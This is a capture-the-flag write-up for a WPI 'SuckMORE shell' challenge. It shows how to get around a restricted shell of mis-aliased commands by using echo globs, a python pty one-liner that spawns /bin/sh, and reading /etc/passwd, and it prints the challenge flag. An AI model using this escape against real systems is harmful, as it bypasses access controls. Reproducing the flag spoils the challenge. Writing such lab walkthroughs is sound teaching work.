Here at Suckmore Software we are committed to delivering a truly unparalleled user experience. Help us out by testing our latest project.
ssh ctf@ pass: i’m a real hacker now


We log into the server and test out our basic commands

root@kali:~# ssh ctf@
ctf@'s password:
SuckMORE shell v1.0.1. Note: for POSIX support update to v1.1.0
     April 2019     
Su Mo Tu We Th Fr Sa
    1  2  3  4  5  6
 7  8  9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30            
suckmore>echo $PWD

It seems like there are some aliases or symbolic links to other executables so lets see if we can find any alias information

alias bash='sh'
alias cat='sleep 1 && vim'
alias cd='cal'
alias cp='grep'
alias dnf=''
alias find='w'
alias less='echo "We are suckMORE, not suckless"'
alias ls='sleep 1'
alias more='echo "SuckMORE shell, v1.0.1, (c) SuckMore Software, a division of WPI Digital Holdings Ltd."'
alias nano='touch'
alias pwd='uname'
alias rm='mv /u/'
alias sh='echo "Why would you ever want to leave suckmore shell?"'
alias sl='ls'
alias vi='touch'
alias vim='touch'
alias which='echo "Not Found"'

Wow it just so happens that a lot of our necessary commands are aliases.

I wonder how we are going to be able to find information from the server. What if we try to echo the contents of a directory. That might work right?

suckmore>echo /* /bin /boot /dev /etc /home /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /srv /sys /tmp /usr /var

Ok perfect time to see what we have avaiable to us.

suckmore>echo /bin/* running this gave too much text to paste here but I did notice pip3.7 was installed meaning we must have python 3 available to us

How about we try the good old (/bin/sh instead of bash because /bin/bash wasnt found) python3 -c 'import pty; pty.spawn("/bin/sh")'

Well that seemed to work. now lets run more /etc/passwd. We got ctf:x:1000:1000::/home/ctf:/bin/sh Lets cd to that home directory and try running an ls. Unfortunately it seems to be permission denied still so lets try echo ./*

WOW theres a hidden file called './flag' which we can read with more to get WPI{bash_sucks0194342}